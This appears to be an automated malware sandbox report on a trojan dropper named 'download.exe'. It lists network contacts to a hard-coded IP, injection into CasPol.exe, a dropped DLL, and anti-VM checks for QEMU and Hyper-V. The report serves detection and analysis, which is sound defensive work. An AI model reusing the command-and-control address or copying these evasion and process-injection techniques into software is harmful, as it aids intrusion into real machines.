2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
          Source: unknown TCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://37.139.128.83/2
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://37.139.128.83/2$2
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://37.139.128.83/2-2
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://37.139.128.83/262hk
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://37.139.128.83/2Data
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://37.139.128.83/2M
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://37.139.128.83/2R2
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://37.139.128.83/2W7
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://37.139.128.83/2e
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://37.139.128.83/2gsLMEM8
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://37.139.128.83/2k
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://37.139.128.83/l
          Source: lang-1032.dll.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: lang-1032.dll.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
          Source: lang-1032.dll.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
          Source: lang-1032.dll.2.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
          Source: lang-1032.dll.2.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
          Source: lang-1032.dll.2.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
          Source: lang-1032.dll.2.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
          Source: lang-1032.dll.2.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: lang-1032.dll.2.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
          Source: lang-1032.dll.2.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
          Source: download.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: download.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: lang-1032.dll.2.dr String found in binary or memory: http://ocsp.digicert.com0C
          Source: lang-1032.dll.2.dr String found in binary or memory: http://ocsp.digicert.com0N
          Source: lang-1032.dll.2.dr String found in binary or memory: http://ocsp.digicert.com0O
          Source: download.exe String found in binary or memory: http://s.symcb.com/universal-root.crl0
          Source: download.exe String found in binary or memory: http://s.symcd.com06
          Source: download.exe String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
          Source: download.exe String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
          Source: download.exe String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
          Source: lang-1032.dll.2.dr String found in binary or memory: http://www.avast.com0/
          Source: lang-1032.dll.2.dr String found in binary or memory: http://www.digicert.com/CPS0
          Source: download.exe String found in binary or memory: https://d.symcb.com/cps0%
          Source: download.exe String found in binary or memory: https://d.symcb.com/rpa0
          Source: download.exe String found in binary or memory: https://d.symcb.com/rpa0.
          Source: lang-1032.dll.2.dr String found in binary or memory: https://www.digicert.com/CPS0
          Source: global traffic HTTP traffic detected: GET /2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 37.139.128.83 Cache-Control: no-cache
          Source: C:\Users\user\Desktop\download.exe Code function: 2_2_004051E2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard
          Source: download.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\download.exe Code function: 2_2_004031E9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,LdrInitializeThunk,DeleteFileA,CopyFileA,LdrInitializeThunk,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
          Source: C:\Users\user\Desktop\download.exe File created: C:\Windows\resources\0409
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32FDA2_2_04A32FDA
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A313362_2_04A31336
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32F3F2_2_04A32F3F
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3233C2_2_04A3233C
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32B012_2_04A32B01
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A31B0F2_2_04A31B0F
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A317182_2_04A31718
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A31B712_2_04A31B71
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A31F752_2_04A31F75
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631C754_2_00631C75
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006324414_2_00632441
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632C374_2_00632C37
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063143B4_2_0063143B
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006318004_2_00631800
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006320184_2_00632018
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006310F64_2_006310F6
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006324DB4_2_006324DB
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006314A84_2_006314A8
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006320AE4_2_006320AE
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006328974_2_00632897
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063189B4_2_0063189B
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063296F4_2_0063296F
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063116E4_2_0063116E
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006325524_2_00632552
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632D304_2_00632D30
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063153A4_2_0063153A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006329094_2_00632909
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631D0C4_2_00631D0C
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063191C4_2_0063191C
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063211C4_2_0063211C
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006321E84_2_006321E8
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006319F64_2_006319F6
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006315D04_2_006315D0
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632DA24_2_00632DA2
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631D824_2_00631D82
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063198B4_2_0063198B
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063318B4_2_0063318B
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063218A4_2_0063218A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006322604_2_00632260
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631E6F4_2_00631E6F
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00630E444_2_00630E44
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631A4D4_2_00631A4D
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632A204_2_00632A20
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063162C4_2_0063162C
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063123F4_2_0063123F
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632A084_2_00632A08
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632E1D4_2_00632E1D
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063261D4_2_0063261D
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006326FB4_2_006326FB
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006312DA4_2_006312DA
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631AA94_2_00631AA9
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006316B34_2_006316B3
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00630E924_2_00630E92
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632E974_2_00632E97
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063269B4_2_0063269B
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00630E9A4_2_00630E9A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631B714_2_00631B71
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631F754_2_00631F75
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006313364_2_00631336
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632F3F4_2_00632F3F
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063233C4_2_0063233C
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632B014_2_00632B01
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631B0F4_2_00631B0F
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006317184_2_00631718
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631BE14_2_00631BE1
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632FDA4_2_00632FDA
          Source: lang-1032.dll.2.dr | Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
          Source: lang-1032.dll.2.dr | Static PE information: No import functions for PE file found
          Source: C:\Users\user\Desktop\download.exe | Section loaded: edgegdi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Section loaded: edgegdi.dll
          Source: download.exe | Static PE information: invalid certificate
          Source: C:\Users\user\Desktop\download.exe | File read: C:\Users\user\Desktop\download.exe
          Source: download.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\download.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Users\user\Desktop\download.exe C:\Users\user\Desktop\download.exe
          Source: C:\Users\user\Desktop\download.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Users\user\Desktop\download.exe
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\download.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Users\user\Desktop\download.exe
          Source: C:\Users\user\Desktop\download.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_004031E9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,LdrInitializeThunk,DeleteFileA,CopyFileA,LdrInitializeThunk,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_004031E9
          Source: C:\Users\user\Desktop\download.exe | File created: C:\Users\user\AppData\Local\Temp\nsp21EF.tmp
          Source: classification engine | Classification label: mal76.troj.evad.winEXE@4/5@0/1
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_004020D1 CoCreateInstance,MultiByteToWideChar,2_2_004020D1
          Source: C:\Users\user\Desktop\download.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_004044AE GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,2_2_004044AE
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4728:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4728:304:WilStaging_02
          Source: download.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Data Obfuscation

          Source: Yara match | File source: 00000004.00000002.5807012371.00000000025EF000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.1806817167.00000000069EF000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.1798739196.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: download.exe PID: 8540, type: MEMORYSTR
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_706B2F20 push eax; ret 2_2_706B2F4E
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A314A8 push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A320AE push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A388BE push esp; ret 2_2_04A388DD
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A32897 push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A3189B push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A30C99 push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A3449E push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A3349D push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A340E2 push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A340E6 push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A394EB push esp; ret 2_2_04A394F1
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A310F6 push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A30CFC push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A33CCE push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A324DB push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A364DC pushfd ; ret 2_2_04A364DD
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A32C37 push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A3143B push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A33C02 push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A31800 push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A3440B push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A3341B push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A32018 push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A3641D push 7E114A25h; iretd 2_2_04A3642D
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A34076 push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A31C75 push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A33878 push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A32441 push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A36C50 pushfd ; ret 2_2_04A36C51
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A335A3 push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_706B1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,2_2_706B1A98
          Source: C:\Users\user\Desktop\download.exe | File created: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll (dropped file)
          Source: C:\Users\user\Desktop\download.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize\lang-1032.dll (dropped file)
          Source: C:\Users\user\Desktop\download.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\download.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\download.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\download.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Users\user\Desktop\download.exe | File opened: C:\Program Files\qga\qga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Program Files\qga\qga.exe
          Source: download.exe, 00000002.00000002.1798739196.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE3
          Source: download.exe, 00000002.00000002.1798739196.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXELE
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 928 | Thread sleep time: -300000s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Last function: Thread delayed
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\download.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize\lang-1032.dll
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_00405745 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,2_2_00405745
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_004026FE FindFirstFileA,2_2_004026FE
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_00406280 FindFirstFileA,FindClose,2_2_00406280
          Source: C:\Users\user\Desktop\download.exe | API call chain: ExitProcess graph end node graph_2-13223
          Source: C:\Users\user\Desktop\download.exe | API call chain: ExitProcess graph end node graph_2-13228
          Source: C:\Users\user\Desktop\download.exe | File opened: C:\Users\user
          Source: C:\Users\user\Desktop\download.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Users\user\Desktop\download.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts
          Source: C:\Users\user\Desktop\download.exe | File opened: C:\Users\user\AppData
          Source: C:\Users\user\Desktop\download.exe | File opened: C:\Users\user\AppData\Roaming
          Source: C:\Users\user\Desktop\download.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: download.exe, 00000002.00000002.1868881002.0000000008269000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Guest Shutdown Service
          Source: download.exe, 00000002.00000002.1868881002.0000000008269000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmicshutdown
          Source: download.exe, 00000002.00000002.1868881002.0000000008269000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: download.exe, 00000002.00000002.1868881002.0000000008269000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V PowerShell Direct Service
          Source: download.exe, 00000002.00000002.1868881002.0000000008269000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Time Synchronization Service
          Source: CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmicvss
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003EAB000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5897618619.0000000003F13000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: download.exe, 00000002.00000002.1798739196.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe3
          Source: download.exe, 00000002.00000002.1868881002.0000000008269000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Data Exchange Service
          Source: download.exe, 00000002.00000002.1868881002.0000000008269000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Heartbeat Service
          Source: download.exe, 00000002.00000002.1868881002.0000000008269000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Guest Service Interface
          Source: download.exe, 00000002.00000002.1798739196.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exele
          Source: CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmicheartbeat
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_706B1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,2_2_706B1A98
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_00403B48 SetWindowPos,ShowWindow,DestroyWindow,SetWindowLongA,GetDlgItem,SendMessageA,IsWindowEnabled,SendMessageA,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,SetClassLongA,SendMessageA,GetDlgItem,ShowWindow,KiUserCallbackDispatcher,EnableWindow,GetSystemMenu,EnableMenuItem,SendMessageA,SendMessageA,SendMessageA,lstrlenA,SetWindowTextA,DestroyWindow,CreateDialogParamA,GetDlgItem,GetWindowRect,ScreenToClient,SetWindowPos,ShowWindow,DestroyWindow,EndDialog,ShowWindow,2_2_00403B48

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\download.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe base: 630000
          Source: C:\Users\user\Desktop\download.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Users\user\Desktop\download.exe
